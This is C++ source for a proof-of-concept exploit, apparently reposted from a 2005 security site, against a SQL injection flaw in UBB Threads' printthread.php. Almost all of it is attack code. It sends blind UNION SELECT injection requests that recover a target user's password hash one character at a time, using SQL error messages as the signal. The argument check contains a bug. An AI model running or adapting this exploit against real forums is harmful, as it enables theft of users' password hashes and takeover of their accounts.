/*
UBB Thread /ubbthreads/printthread.php SQL Injection vulnerability
Usage: HLLUBBThreadsExploit.exe <hostname> <path to
printthread.php>
<Any vaild forum name> <user id>
Example: HLLUBBThreadsExploit.exe www.host.com
/ubbthreads/printthread.php
UBB3 2
Vulnerability discovered by: Axl
Exploit Coded by HLL: hllhll <at> gmail.com
*/
#include <winsock2.h>
#include <stdio.h>
#include <conio.h>
#include <iostream.h>
#pragma comment (lib,"ws2_32")
void usage(char *argv[])
{
cout << "[+] UBB Threads Proof-Of-Concept Exploit, Written by:
HLL" << endl;
cout << "[+] Usage:" << endl;
cout << "[+] " << argv[0] << "
<hostname> <path to printthread.php> <Any vaild forum
name> <user name> " << endl;
cout << "[+] " << argv[0] << "
www.host.com /ubbthreads/printthread.php UBB3 HLL"
<< endl;
}
int main(int argc, char *argv[]){
WSADATA wsaData;
struct sockaddr_in saddr;
WSAStartup(MAKEWORD(1, 1), &wsaData);
struct hostent *h;
char hash[34]={0};
int rcvlen;
char ch;
int flag, pos;
int countwait;
SOCKET sock;
char req[400];
char buf[600];
char rcvbuf[10000];
char rcvtmpbuf[1024];
char *host=argv[1]; //Server
char *path=argv[2]; // Path to /ubbthreads/printthread.php
char *fname=argv[3]; //Forum name
int uid=atoi(argv[4]); //User id
if (argv!=5){
usage(argv);
return(0);
}
//Resolve address (will work also if this is an IP)
cout << "[+] Resolving host... ";
if (!(h=gethostbyname(host)))
{
cout << "FAILD!" << endl;
return(1);
}
cout << "Done." << endl;
saddr.sin_addr=*(struct in_addr *)h->h_addr_list[0];
memset(saddr.sin_zero, 0, 8);
saddr.sin_port=htons(80);
saddr.sin_family=AF_INET;
cout << "[+] Exploiting target... " << endl;
for (pos=1; pos<=32; pos++)
{
for (ch='0'; ch<='F'; ch++)
{
if ( (sock=socket(AF_INET, SOCK_STREAM, 0)) == -1 )
{
cout << "FAILD CREATING SOCKET!" << endl;
return(1);
}
if (ch==':') ch='A'; //If finished all digits, jump to hex digits
//Prepare reqest
sprintf(req,
"%s?Board=%s&type=post&main=-99'%%20UNION%%20SELECT%%20B_Number,
B_Posted%%20FROM%%20w3t_Posts,w3t_Users%%20WHERE%%20((MID(U_Password,%d,1)='%c')",
path,
fname, pos, ch, pos, ch+32);
if (ch>='A' && ch<='Z')
sprintf(req, "%sOR%%20(MID(U_Password,%d,1)='%c')", req, pos,
ch+32);
sprintf(req, "%s)AND(u_number=%d)/*", req, uid);
sprintf(buf, "GET %s HTTP/1.0\r\nAccept: * /*\r\nUser-Agent:
Mozilla/4.0 (compatible;
MSIE 5.5; Windows 98; DigExt)\r\nHost: %s \r\n\r\n", req, host);
connect(sock, (struct sockaddr *)&saddr, sizeof(struct sockaddr) );
send(sock, buf, strlen(buf), 0);
cout << "[+] Char: " << ch << endl;
//Loop untill disconnection or recognized string
flag=0;
countwait=0;
*rcvbuf=NULL;
while(!flag){
Sleep(30);
if ((rcvlen = recv(sock, rcvtmpbuf, 1023, 0))>0){
rcvtmpbuf[rcvlen]=NULL;
strcat(rcvbuf, rcvtmpbuf);
}
if ( (++countwait) == 30)
flag=2;
if ( strstr(rcvbuf, "SQL Error"))
flag=1;
}
if (flag==1){ //Char found
cout << "[+] Char " << ch << " In pos
" << pos << endl;
hash[pos-1]=ch;
ch='G';
}
closesocket(sock);
}
}
hash[32]=NULL;
cout << endl << "The hash for user id" << uid
<< "is: " << hash << endl;
WSACleanup();
return (0);
}
securitydot.net - 2005-04-19
|
